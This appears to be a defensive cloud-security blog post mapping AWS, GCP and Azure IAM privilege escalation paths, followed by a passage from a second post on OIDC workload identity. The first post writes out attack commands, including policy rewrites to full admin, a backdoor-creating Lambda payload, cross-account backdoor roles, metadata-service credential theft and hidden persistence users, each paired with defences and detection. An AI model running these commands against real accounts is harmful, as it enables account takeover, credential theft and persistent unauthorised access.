  │  iam:UpdateAssumeRolePolicy → hijack an existing admin role    │
  │  SSRF → IMDS              →  steal instance role credentials   │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PERSISTENCE (before incident response begins)                  │
  │  Create hidden IAM user · cross-account backdoor role          │
  │  Add personal account at org level (GCP)                       │
  │  These survive: password resets, key rotation, even            │
  │  deletion of the original compromised credential               │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  Impact: data exfiltration · destruction · ransomware · mining

AWS IAM privilege escalation follows a consistent pattern across almost every significant cloud breach: a limited initial credential, a chain of IAM permissions that expand access, and damage that’s proportional to how much room the IAM design gave the attacker to move. This episode maps the paths — as concrete techniques with specific permissions, because defending against them requires understanding exactly what they exploit.


Introduction

AWS IAM privilege escalation turns misconfigured permissions into full account compromise — and the entry point is rarely the attack that matters. In 2019, Capital One suffered a breach that exposed over 100 million customer records. The attacker didn’t find a zero-day. They exploited an SSRF vulnerability in a web application firewall, reached the EC2 instance metadata service, retrieved temporary credentials for the instance’s IAM role, and found a role with sts:AssumeRole permissions that let it assume a more powerful role. That more powerful role had access to S3 buckets containing customer data.

The SSRF got the attacker a foothold. The IAM design determined how far they could go.

This is the pattern across almost every significant cloud breach: a limited initial credential, followed by a privilege escalation path through IAM, followed by the actual damage. The damage is determined not by the sophistication of the initial compromise but by how much room the IAM configuration gives an attacker to move.

This episode maps the paths. Not as theory — as concrete techniques with specific permissions, because understanding exactly what an attacker can do with a specific IAM misconfiguration is the only way to prioritize what to fix. The defensive controls are listed alongside each path because that’s where they’re most useful.


The Attack Chain

Most cloud account compromises follow a consistent pattern:

Initial Access
  (compromised credential — exposed access key, SSRF to IMDS,
   compromised developer workstation, phished IdP session)
    │
    ▼
Discovery
  (what am I? what can I do? what can I reach?)
    │
    ▼
Privilege Escalation
  (use existing permissions to gain more permissions)
    │
    ▼
Lateral Movement
  (access other accounts, services, resources)
    │
    ▼
Persistence
  (create backdoor identities that survive credential rotation)
    │
    ▼
Impact
  (data exfiltration, destruction, ransomware, crypto mining)

Understanding this chain tells you where to put defensive controls. You can cut the chain at any link. The earlier the better — but it’s better to have multiple cuts than to assume a single control holds.


Phase 1: Discovery — An Attacker’s First Steps

The moment an attacker has any cloud credential, they enumerate. This is low-noise, uses only read permissions, and in many environments goes completely undetected:

# AWS: establish identity
aws sts get-caller-identity
# Returns: Account, UserId, Arn — tells the attacker what they're working with

# Enumerate attached policies
aws iam list-attached-user-policies --user-name alice
aws iam list-user-policies --user-name alice
aws iam list-groups-for-user --user-name alice
aws iam list-attached-role-policies --role-name LambdaRole

# Read the actual policy document
aws iam get-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevAccess \
  --version-id v1

# Survey what's accessible
aws s3 ls
aws ec2 describe-instances --output table
aws secretsmanager list-secrets
aws ssm describe-parameters

# GCP: establish identity and permissions
gcloud auth list
gcloud projects get-iam-policy PROJECT_ID --format=json | \
  jq '.bindings[] | select(.members[] | contains("[email protected]"))'

# Test specific permissions
gcloud projects test-iam-permissions PROJECT_ID \
  --permissions="storage.objects.list,iam.roles.create,iam.serviceAccountKeys.create"

# Azure: establish context
az account show
az role assignment list --assignee [email protected] --all --output table

All of this is read-only. In most environments I’ve reviewed, there are no alerts on this activity unless the calls come from an unusual IP or at an unusual time. An attacker comfortable with the AWS CLI can map the permission surface of a compromised credential in 10–15 minutes.
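If you want even a crude detection, count read-only IAM/STS calls per identity over a short window of CloudTrail events. A sketch over a simplified event shape (field names here are flattened for illustration):

```python
from collections import Counter

READ_PREFIXES = ("Get", "List", "Describe")

def enumeration_bursts(events, threshold=10):
    """Identities making an unusual number of read-only IAM/STS calls,
    a rough enumeration heuristic over simplified CloudTrail events."""
    counts = Counter()
    for e in events:
        if e["eventSource"] in ("iam.amazonaws.com", "sts.amazonaws.com") \
           and e["eventName"].startswith(READ_PREFIXES):
            counts[e["user"]] += 1
    return {user: n for user, n in counts.items() if n >= threshold}

events = (
    [{"user": "alice", "eventName": "ListAttachedUserPolicies",
      "eventSource": "iam.amazonaws.com"}] * 12
    + [{"user": "bob", "eventName": "GetCallerIdentity",
        "eventSource": "sts.amazonaws.com"}] * 2
)
print(enumeration_bursts(events))  # {'alice': 12}
```

Legitimate automation will trip this too, so the threshold and an allowlist need tuning per environment; the point is that enumeration is cheap to spot once you look.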


AWS Privilege Escalation Paths

Path 1: iam:CreatePolicyVersion

The most direct path. If a principal can create a new version of a policy attached to themselves, they can rewrite it to grant anything.

# Attacker has iam:CreatePolicyVersion on a policy attached to their own role
aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
  }' \
  --set-as-default
# Result: DevPolicy now grants AdministratorAccess to everyone with it attached

The attacker doesn’t need to create new infrastructure. They inject admin access directly into their existing permission set. This is often undetected by basic monitoring because CreatePolicyVersion is a low-frequency legitimate operation.

Defence: Alert on every CreatePolicyVersion call. Restrict the permission to a dedicated break-glass IAM role. Use permissions boundaries on developer roles to cap the maximum permissions they can ever hold.

Path 2: iam:PassRole + Service Creation

iam:PassRole allows an identity to assign an IAM role to an AWS service. This is legitimate and necessary — it’s how you configure “this Lambda function runs with this role.” The attack vector: if a more powerful role exists in the account, and the attacker can pass it to a service they control and invoke that service, they operate with the more powerful role’s permissions.

# Attacker has: lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
# They know an existing AdminRole exists (discovered during enumeration)

# Create a Lambda that runs with AdminRole
aws lambda create-function \
  --function-name exfil-fn \
  --runtime python3.12 \
  --role arn:aws:iam::123456789012:role/AdminRole \
  --handler index.handler \
  --zip-file fileb://payload.zip

# Invoke — code now executes with AdminRole's permissions
aws lambda invoke --function-name exfil-fn /tmp/output.json

# index.py, the payload inside payload.zip: executes with AdminRole's credentials
import boto3

def handler(event, context):
    # Running as AdminRole
    s3 = boto3.client('s3')
    buckets = s3.list_buckets()

    # Create a backdoor access key while we have elevated access
    iam = boto3.client('iam')
    key = iam.create_access_key(UserName='backdoor-user')

    return {"buckets": [b['Name'] for b in buckets['Buckets']], "key": key}

Defence: Scope iam:PassRole to specific role ARNs — never Resource: *. Example:

{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/LambdaExecutionRole-*"
}

Path 3: iam:CreateRole + iam:AttachRolePolicy

If an attacker can both create a role and attach policies to it, they create a backdoor identity:

# Create a role with a trust policy naming an attacker-controlled principal
aws iam create-role \
  --role-name BackdoorRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'

# Attach AdministratorAccess
aws iam attach-role-policy \
  --role-name BackdoorRole \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Assume it from the attacker's account — persistent cross-account access
aws sts assume-role \
  --role-arn arn:aws:iam::TARGET_ACCOUNT:role/BackdoorRole \
  --role-session-name persistent-access

This is persistence, not just escalation — the backdoor survives password resets, access key rotation, even deletion of the original compromised credential.
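Backdoors of this shape are detectable by scanning trust policies for AWS principals outside your own account; a minimal sketch against the Step 1 snapshot format (allowlisting known partner accounts is left out):

```python
def external_trusts(snapshot: dict, our_account: str) -> list:
    """Roles whose trust policy admits an AWS principal from another account,
    the shape of the backdoor above. `snapshot` comes from
    `aws iam get-account-authorization-details`."""
    findings = []
    for role in snapshot.get("RoleDetailList", []):
        for stmt in role.get("AssumeRolePolicyDocument", {}).get("Statement", []):
            principals = stmt.get("Principal", {}).get("AWS", [])
            for arn in [principals] if isinstance(principals, str) else principals:
                # the account id sits between '::' and the next ':' in the ARN
                if f"::{our_account}:" not in arn:
                    findings.append((role["RoleName"], arn))
    return findings

snapshot = {"RoleDetailList": [
    {"RoleName": "BackdoorRole",
     "AssumeRolePolicyDocument": {"Statement": [
         {"Effect": "Allow",
          "Principal": {"AWS": "arn:aws:iam::999999999999:root"},
          "Action": "sts:AssumeRole"}]}},
]}
print(external_trusts(snapshot, "123456789012"))
```

Every hit is either a documented cross-account integration or an incident; there is no third category.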

Path 4: iam:UpdateAssumeRolePolicy

If an existing high-privilege role already exists, modifying its trust policy to allow the attacker’s principal is faster and quieter than creating a new role:

# Add attacker's principal to the trust policy of an existing AdminRole
aws iam update-assume-role-policy \
  --role-name ExistingAdminRole \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"},
      {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"}, "Action": "sts:AssumeRole"}
    ]
  }'

The original entry remains intact. A casual review might miss the addition. Trust policy changes should be critical-priority alerts.

Path 5: SSRF to EC2 Instance Metadata

The Capital One path. Any SSRF vulnerability in a web application running on EC2 can retrieve the instance role’s credentials from the metadata service:

Attacker → SSRF → GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
→ Returns role name
→ GET http://169.254.169.254/latest/meta-data/iam/security-credentials/MyAppRole
→ Returns: AccessKeyId, SecretAccessKey, Token (valid up to 6 hours)

Defence: IMDSv2 requires a PUT request first, blocking simple GET-based SSRF:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {"ec2:MetadataHttpTokens": "required"}
  }
}

High-Risk AWS Permissions Reference

| Permission | Why It’s Dangerous |
|---|---|
| iam:PassRole with Resource: * | Assign any role to any service — enables immediate privilege escalation |
| iam:CreatePolicyVersion | Rewrite any policy to grant anything — full account takeover in one API call |
| iam:AttachRolePolicy | Attach AdministratorAccess to any role |
| iam:UpdateAssumeRolePolicy | Add any principal to any role’s trust policy |
| iam:CreateAccessKey on other users | Create persistent credentials for any IAM user |
| lambda:UpdateFunctionCode on privileged Lambda | Inject malicious code into an elevated function |
| secretsmanager:GetSecretValue with Resource: * | Read every secret in the account |
| ssm:GetParameter with Resource: * | Read all Parameter Store values — often contains credentials |
| iam:CreateRole + iam:AttachRolePolicy | Create and arm a backdoor role |

GCP Privilege Escalation Paths

iam.serviceAccounts.actAs

GCP’s equivalent of iam:PassRole — and broader. Allows an identity to make any GCP service act as a specified service account:

# Attacker has iam.serviceAccounts.actAs on an admin SA
gcloud --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com \
  iam roles list --project=my-project

# Generate a full access token and call any GCP API as admin-sa
gcloud auth print-access-token \
  --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com

iam.serviceAccountKeys.create

Converts a short-lived identity into a persistent one. Create a key for an admin service account and you have indefinite access:

gcloud iam service-accounts keys create admin-key.json \
  --iam-account=admin-sa@project.iam.gserviceaccount.com
# Valid until explicitly deleted — no expiry by default

# Block this at org level (the organization is identified by the
# name field inside the policy file)
cat > disable-sa-keys.yaml << 'EOF'
name: organizations/ORG_ID/policies/iam.disableServiceAccountKeyCreation
spec:
  rules:
    - enforce: true
EOF
gcloud org-policies set-policy disable-sa-keys.yaml

Azure Privilege Escalation Paths

Microsoft.Authorization/roleAssignments/write

If an identity can write role assignments, it can grant itself Owner at any scope it can write to:

az role assignment create \
  --assignee attacker@example.com \
  --role "Owner" \
  --scope /subscriptions/SUB_ID

Managed Identity Assignment

Attach a high-privilege managed identity to a VM the attacker controls, then retrieve its token via IMDS:

az vm identity assign \
  --name attacker-vm --resource-group rg-attacker \
  --identities /subscriptions/SUB/resourcegroups/rg-prod/providers/\
Microsoft.ManagedIdentity/userAssignedIdentities/admin-identity

# From inside the VM (the URL must stay on one line — a backslash
# inside single quotes is literal, not a line continuation)
curl -H 'Metadata: true' \
  'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'

Persistence — How Attackers Outlast Incident Response

# AWS: hidden IAM user with admin access
aws iam create-user --user-name svc-backup-01
aws iam attach-user-policy \
  --user-name svc-backup-01 \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name svc-backup-01
# Valid until manually deleted — survives key rotation on other identities

# AWS: cross-account backdoor — hardest to find during IR
aws iam create-role --role-name svc-monitoring-role \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'
aws iam attach-role-policy --role-name svc-monitoring-role \
  --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess

# GCP: add personal account at org level — survives project deletion
gcloud organizations add-iam-policy-binding ORG_ID \
  --member="user:attacker@example.com" --role="roles/owner"

Cross-account backdoors are particularly resilient — incident responders often focus on the compromised account without auditing trust relationships with external accounts.
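Auditing for this is mechanical once you know to look. An illustrative sketch (not a real tool) that flags trust policies referencing account IDs outside your organisation — the org_accounts set is an assumption you would populate from AWS Organizations:

```python
import re

def external_trust_accounts(trust_policy, org_accounts):
    """Return AWS account IDs trusted by a role that are outside your org.

    Cross-account backdoors look like ordinary roles; the tell is an
    unfamiliar account ID in the trust policy.
    """
    external = set()
    for stmt in trust_policy.get("Statement", []):
        values = stmt.get("Principal", {}).get("AWS", [])
        if isinstance(values, str):
            values = [values]
        for arn in values:
            m = re.search(r"arn:aws:iam::(\d{12}):", arn)
            if m and m.group(1) not in org_accounts:
                external.add(m.group(1))
    return external

# The backdoor role from the example above
backdoor = {"Statement": [{"Effect": "Allow",
                           "Principal": {"AWS": "arn:aws:iam::999988887777:root"},
                           "Action": "sts:AssumeRole"}]}

print(external_trust_accounts(backdoor, org_accounts={"123456789012"}))
# the foreign account ID is flagged
```

Run it over every role's AssumeRolePolicyDocument and any account ID you don't recognise is either a vendor integration you can document or a backdoor you just found.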


Detection — What to Alert On

┌───────────────────────────────────────────────┬──────────────────────────────────────────────┬──────────┐
│ Activity                                      │ Event to Watch                               │ Priority │
├───────────────────────────────────────────────┼──────────────────────────────────────────────┼──────────┤
│ Role trust policy modified                    │ UpdateAssumeRolePolicy                       │ Critical │
│ New IAM user created                          │ CreateUser                                   │ High     │
│ Policy version created                        │ CreatePolicyVersion                          │ High     │
│ Policy attached to role                       │ AttachRolePolicy, PutRolePolicy              │ High     │
│ SA key created (GCP)                          │ google.iam.admin.v1.CreateServiceAccountKey  │ High     │
│ Role assignment at subscription scope (Azure) │ roleAssignments/write at /subscriptions/     │ Critical │
│ CloudTrail logging disabled                   │ StopLogging, DeleteTrail                     │ Critical │
│ GetSecretValue at unusual hours               │ secretsmanager:GetSecretValue                │ Medium   │
└───────────────────────────────────────────────┴──────────────────────────────────────────────┴──────────┘

IAM events are low-volume in most accounts. That makes anomaly detection straightforward — a spike in IAM API calls outside business hours from an unusual principal is a strong signal. Configure the critical-priority events as real-time alerts, not just logged events.
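As a sketch, the table above reduces to a small lookup you could drop into a log pipeline. The triage function is illustrative, not a real tool; event names are the CloudTrail values from the table:

```python
# Priority mapping lifted from the detection table above
EVENT_PRIORITY = {
    "UpdateAssumeRolePolicy": "critical",
    "StopLogging": "critical",
    "DeleteTrail": "critical",
    "CreateUser": "high",
    "CreatePolicyVersion": "high",
    "AttachRolePolicy": "high",
    "PutRolePolicy": "high",
    "GetSecretValue": "medium",
}

def triage(record):
    """Map a CloudTrail record to an alert priority.

    Unknown events fall through to 'info' — IAM mutations are the
    high-signal set, not every API call.
    """
    return EVENT_PRIORITY.get(record.get("eventName", ""), "info")

print(triage({"eventName": "UpdateAssumeRolePolicy"}))   # critical
print(triage({"eventName": "ListBuckets"}))              # info
```

In practice the same mapping would live in an EventBridge rule or SIEM correlation rule; the point is that the critical set is small enough to enumerate exhaustively.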


⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — "We have SCPs, so individual role permissions       ║
║       don't matter as much"                                          ║
║                                                                      ║
║  SCPs set the ceiling. If an SCP allows iam:PassRole, any role      ║
║  with that permission can exploit it regardless of how "scoped"     ║
║  the SCP looks. SCPs and role-level permissions both need to be     ║
║  reviewed — they are independent layers.                            ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary doesn't stop iam:PassRole     ║
║                                                                      ║
║  A permissions boundary caps what a role can do directly. It does   ║
║  NOT prevent that role from passing a more powerful role to a       ║
║  Lambda or EC2. iam:PassRole escalation bypasses the boundary       ║
║  because the attacker is operating through the service, not         ║
║  directly through the bounded role.                                 ║
║                                                                      ║
║  Fix: scope iam:PassRole to specific ARNs regardless of whether     ║
║  a permissions boundary is in place.                                ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — CloudTrail doesn't log data plane events by default ║
║                                                                      ║
║  S3 object reads (GetObject), Lambda invocations, and DynamoDB      ║
║  item-level operations are data events — not logged by CloudTrail   ║
║  unless you explicitly enable Data Events. An attacker exfiltrating ║
║  data via these calls leaves no trace in a default CloudTrail       ║
║  configuration. (Secrets Manager GetSecretValue IS logged by        ║
║  default as a management event — but only helps if you alert on it.)║
║                                                                      ║
║  Fix: enable S3 and Lambda data events in CloudTrail, and alert on  ║
║  secretsmanager:GetSecretValue calls from unusual principals.       ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌──────────────────────────────────┬──────────────────────────────────────────────────────┐
│ Permission                       │ Escalation Path                                      │
├──────────────────────────────────┼──────────────────────────────────────────────────────┤
│ iam:CreatePolicyVersion          │ Rewrite your own policy to grant *:*                 │
│ iam:PassRole (Resource: *)       │ Assign AdminRole to a Lambda/EC2 you control         │
│ iam:CreateRole+AttachRolePolicy  │ Create and arm a backdoor cross-account role         │
│ iam:UpdateAssumeRolePolicy       │ Hijack existing admin role's trust policy            │
│ iam.serviceAccounts.actAs (GCP)  │ Impersonate any service account including admins     │
│ iam.serviceAccountKeys.create    │ Generate permanent key for any SA                    │
│ roleAssignments/write (Azure)    │ Assign Owner to yourself at subscription scope       │
└──────────────────────────────────┴──────────────────────────────────────────────────────┘

Defensive commands:
┌──────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — dump the default version of every customer-managed policy                   │
│  # (look for iam:PassRole with "Resource": "*")                                      │
│  aws iam list-policies --scope Local \                                               │
│    --query 'Policies[*].[Arn,DefaultVersionId]' --output text | \                    │
│  while read -r arn ver; do                                                           │
│    aws iam get-policy-version --policy-arn "$arn" \                                  │
│      --version-id "$ver" --query 'PolicyVersion.Document'                            │
│  done                                                                                │
│                                                                                      │
│  # AWS — check who can assume a given role                                           │
│  aws iam get-role --role-name AdminRole \                                            │
│    --query 'Role.AssumeRolePolicyDocument'                                           │
│                                                                                      │
│  # AWS — simulate whether a principal can CreatePolicyVersion                        │
│  aws iam simulate-principal-policy \                                                 │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/DevRole \                           │
│    --action-names iam:CreatePolicyVersion \                                          │
│    --resource-arns arn:aws:iam::ACCOUNT:policy/DevPolicy                             │
│                                                                                      │
│  # GCP — check who has actAs on a service account                                    │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL --format=json | \               │
│    jq '.bindings[] | select(.role=="roles/iam.serviceAccountUser")'                  │
│                                                                                      │
│  # GCP — list service account keys (find persistent backdoors)                       │
│  gcloud iam service-accounts keys list --iam-account=SA_EMAIL                        │
│                                                                                      │
│  # Azure — list all role assignments at subscription scope                           │
│  az role assignment list --scope /subscriptions/SUB_ID --output table                │
└──────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

┌──────────────────────────────────────────────────┬───────────────────────────────────────────────┐
│ Framework Reference                              │ What It Covers Here                           │
├──────────────────────────────────────────────────┼───────────────────────────────────────────────┤
│ CISSP Domain 6 — Security Assessment and Testing │ IAM attack paths are the foundation of cloud  │
│                                                  │ penetration testing and access review         │
│                                                  │ methodology                                   │
│ CISSP Domain 5 — Identity and Access Management  │ Defensive IAM design requires understanding   │
│                                                  │ offensive technique — you cannot protect      │
│                                                  │ paths you don’t know exist                    │
│ ISO 27001:2022 8.8 — Management of technical     │ IAM misconfigurations are technical           │
│ vulnerabilities                                  │ vulnerabilities — identifying and remediating │
│                                                  │ privilege escalation paths                    │
│ ISO 27001:2022 8.16 — Monitoring activities      │ Detection signals and alerting on IAM         │
│                                                  │ mutations as part of continuous monitoring    │
│ SOC 2 CC7.1 — Threat and vulnerability           │ This episode maps the threat model for        │
│ identification                                   │ cloud IAM                                     │
│ SOC 2 CC6.1 — Logical access controls            │ Understanding attack paths informs the design │
│                                                  │ of logical access controls that actually hold │
└──────────────────────────────────────────────────┴───────────────────────────────────────────────┘

Key Takeaways

  • Cloud breaches are IAM events — the initial compromise is just the door; IAM misconfigurations determine how far an attacker can go
  • iam:PassRole with Resource: * is AWS’s highest-risk single permission — scope it to specific role ARNs or the escalation paths multiply
  • iam:CreatePolicyVersion and iam:UpdateAssumeRolePolicy are privilege escalation and persistence primitives — restrict them to dedicated admin roles
  • iam.serviceAccounts.actAs in GCP and roleAssignments/write in Azure are direct equivalents — same threat model, cloud-specific syntax
  • Enforce IMDSv2 on EC2; disable SA key creation org-wide in GCP; restrict role assignment scope in Azure
  • Enable CloudTrail Data Events — default logging misses S3 object reads, Lambda invocations, and other data plane calls entirely
  • Alert on IAM mutations — low-volume, high-signal events that should never go unmonitored

What’s Next

You now know how attackers move through misconfigured IAM. AWS least privilege audit is the defensive counterpart — using Access Analyzer, GCP IAM Recommender, and Azure Access Reviews to find and right-size over-permissioned access before an attacker does. The goal: get from wildcard policies to scoped, auditable permissions without breaking production.

Next: AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Get EP09 in your inbox when it publishes → linuxcent.com/subscribe

OIDC Workload Identity: Eliminate Cloud Access Keys Entirely

Reading Time: 12 minutes

Meta Description: Replace static cloud credentials with OIDC workload identity — eliminate key rotation entirely for Lambda, GKE, and EKS workloads in production.




TL;DR

  • Workload identity federation replaces static cloud access keys with short-lived tokens tied to runtime identity — no key to rotate, no secret to leak
  • The OIDC token exchange pattern is consistent across AWS (IRSA / Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, translate the others
  • AWS EKS: use Pod Identity for new clusters; IRSA is the pattern for existing ones — both eliminate static keys
  • GCP GKE: --workload-pool at cluster level + roles/iam.workloadIdentityUser binding on the GCP service account
  • Azure AKS: federated credential on a managed identity + azure.workload.identity/use: "true" pod label
  • Cross-cloud federation works: an AWS IAM role can call GCP APIs without a GCP key file on the AWS side
  • Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; give each workload its own identity

The Big Picture

  WORKLOAD IDENTITY FEDERATION — BEFORE AND AFTER

  ── STATIC CREDENTIALS (the broken model) ────────────────────────────────

  IAM user created → access key generated
         ↓
  Key distributed to pods / CI / servers → stored in Secrets, env vars, .env
         ↓
  Valid indefinitely — never expires on its own
         ↓
  Rotation is manual, painful, deferred ("there's a ticket for that")
         ↓
  Key proliferates across environments — you lose track of every copy
         ↓
  Leaked key → unlimited blast radius until someone notices and revokes it

  ── WORKLOAD IDENTITY FEDERATION (the current model) ─────────────────────

  No key created. No key distributed. No key to rotate.

  Workload starts → requests signed JWT from its native IdP
         │           (EKS OIDC issuer, GitHub Actions, GKE metadata server)
         ↓
  JWT carries workload claims: namespace, service account, repo, instance ID
         ↓
  Cloud STS / token endpoint validates JWT signature + trust conditions
         ↓
  Short-lived credential issued  (AWS STS: 1–12h  |  GCP/Azure: ~1h)
         ↓
  Credential expires automatically — nothing to clean up
         ↓
  Token stolen → usable for 1 hour maximum, audience-bound, not reusable

Workload identity federation is the architectural answer to static credential sprawl. The workload’s proof of identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. The cloud provider never issues a persistent secret. This episode covers how that exchange works across all three clouds and Kubernetes.


Introduction

Workload identity federation eliminates static cloud credentials by replacing them with short-lived tokens that the runtime environment generates and the cloud provider validates against a registered trust relationship. No key to distribute, no rotation schedule to maintain, no proliferation to track.

A while back I was reviewing a Kubernetes cluster that had been running in production for about two years. The team had done good work — solid app code, reasonable cluster configuration. But when I started looking at how pods were authenticating to AWS, I found what I find in roughly 60% of environments I look at.

Twelve service accounts. Twelve access key pairs. Keys created 6 to 24 months ago. Stored as Kubernetes Secrets. Mounted into pods as environment variables. Never rotated because “the app would need to be restarted” and nobody owned the rotation schedule. Two of the keys belonged to AWS IAM users who no longer worked at the company — the users had been deactivated, but the access keys were still valid because in AWS, access keys live independently of console login status.

When I asked who was responsible for rotating these, the answer I got was: “There’s a ticket for that.”

There’s always a ticket for that.

The engineering problem here isn’t that the team was careless. It’s that static credentials are fundamentally unmanageable at scale. Workload identity removes the problem at its root.


Why Static Credentials Are the Wrong Model for Machines

Before getting into solutions, let me be precise about why this is a security problem, not just an operational inconvenience.

Static credentials have four fundamental failure modes:

They don’t expire. An AWS access key created in 2022 is valid in 2026 unless someone explicitly rotates it. GitGuardian’s 2024 data puts the average time from secret creation to detection at 328 days. That’s almost a year of exposure window before anyone even knows.

They lose origin context. When an API call arrives at AWS with an access key, the authorization system can tell you what key was used — not whether it was used by your Lambda function, by a developer debugging something, or by an attacker using a stolen copy. Static credentials are context-blind.

They proliferate invisibly. One key, distributed to a team, copied into three environments, cached on developer laptops, stored in a CI/CD pipeline, pasted into a config file in a test environment that got committed. By the time you need to rotate it, you don’t know all the places it lives.

Rotation is operationally painful. Creating a new key, updating every place the old key lives, removing the old key — while ensuring nothing breaks during the transition — is a coordination exercise that organizations consistently defer. Every month the rotation doesn’t happen is another month of accumulated risk.

Workload identity solves all four by replacing persistent credentials with short-lived tokens that are generated from the runtime environment and verified by the cloud provider against a registered trust relationship.
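The first failure mode is at least measurable before you migrate. An illustrative sketch that flags stale keys, shaped like the AccessKeyMetadata entries aws iam list-access-keys returns (the 90-day window is an assumption, not an AWS default):

```python
from datetime import datetime, timedelta, timezone

def stale_keys(keys, max_age_days=90):
    """Given AccessKeyMetadata-shaped entries, return active key IDs
    older than the rotation window."""
    cutoff = datetime.now(timezone.utc) - timedelta(days=max_age_days)
    return [k["AccessKeyId"] for k in keys
            if k["Status"] == "Active" and k["CreateDate"] < cutoff]

# Two keys: one 400 days old, one fresh
keys = [
    {"AccessKeyId": "AKIAEXAMPLE1", "Status": "Active",
     "CreateDate": datetime.now(timezone.utc) - timedelta(days=400)},
    {"AccessKeyId": "AKIAEXAMPLE2", "Status": "Active",
     "CreateDate": datetime.now(timezone.utc) - timedelta(days=10)},
]

print(stale_keys(keys))   # the 400-day-old key is flagged
```

In the cluster I described above, every one of the twelve keys would have been flagged. The script tells you the size of the problem; workload identity is what removes it.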


The OIDC Exchange — What’s Actually Happening

All three major cloud providers have converged on the same underlying mechanism: OIDC token exchange.

Workload (pod, GitHub Actions runner, EC2 instance, on-prem server)
    │
    │  1. Request a signed JWT from the native identity provider
    │     (EKS OIDC server, GitHub's token.actions.githubusercontent.com,
    │      GKE metadata server, Azure IMDS)
    ▼
Native IdP issues a JWT. It contains claims about the workload:
    - What repository triggered this CI run
    - What Kubernetes namespace and service account this pod uses
    - What EC2 instance ID this request came from
    │
    │  2. Workload presents the JWT to the cloud STS / federation endpoint
    ▼
Cloud IAM evaluates:
    - Is the JWT signature valid? (verified against the IdP's public keys)
    - Does the issuer match a registered trust relationship?
    - Do the claims match the conditions in the trust policy?
    │
    │  3. If all checks pass: short-lived cloud credentials issued
    │     (AWS: temporary STS credentials, expiry 1-12 hours)
    │     (GCP: OAuth2 access token, expiry ~1 hour)
    │     (Azure: access token, expiry ~1 hour)
    ▼
Workload calls cloud API with short-lived credentials.
Credentials expire. Nothing to clean up. Nothing to rotate.

No static secret is stored anywhere. The workload’s identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. If someone steals the short-lived token, it expires in an hour. If someone tries to use a token for a different resource than it was issued for, the audience claim doesn’t match and it’s rejected.
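The cloud side's evaluation in steps 2 and 3 can be sketched as a claim-matching function. This is illustrative only; a real STS endpoint also verifies the JWT signature against the IdP's published keys before looking at any claim:

```python
import time

def evaluate_trust(jwt_claims, trust):
    """Model of the cloud-side checks before minting short-lived credentials.

    Signature verification is assumed to have already passed; this models
    only the claim matching against the registered trust relationship.
    """
    if jwt_claims.get("iss") != trust["issuer"]:
        return False    # issuer not registered
    if jwt_claims.get("aud") != trust["audience"]:
        return False    # token minted for a different consumer
    if jwt_claims.get("sub") != trust["subject"]:
        return False    # wrong workload identity
    if jwt_claims.get("exp", 0) <= time.time():
        return False    # token already expired
    return True

# Hypothetical EKS-style trust relationship and token claims
trust = {
    "issuer": "https://oidc.eks.eu-west-1.amazonaws.com/id/EXAMPLE",
    "audience": "sts.amazonaws.com",
    "subject": "system:serviceaccount:production:app-backend",
}
claims = {"iss": trust["issuer"], "aud": "sts.amazonaws.com",
          "sub": "system:serviceaccount:production:app-backend",
          "exp": time.time() + 3600}

print(evaluate_trust(claims, trust))   # matching claims pass
print(evaluate_trust({**claims, "sub": "system:serviceaccount:staging:app-backend"}, trust))
# same cluster, wrong namespace: rejected
```

Every rejection branch here corresponds to a real failure mode: a stolen token replayed against the wrong audience, a pod in the wrong namespace, an expired credential.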


AWS: IRSA and Pod Identity for EKS

IRSA — The Original Pattern

IRSA (IAM Roles for Service Accounts) federates a Kubernetes service account identity with an AWS IAM role. Each pod’s service account is the proof of identity; AWS issues temporary credentials in exchange for the OIDC JWT.

# Step 1: get the OIDC issuer URL for your EKS cluster
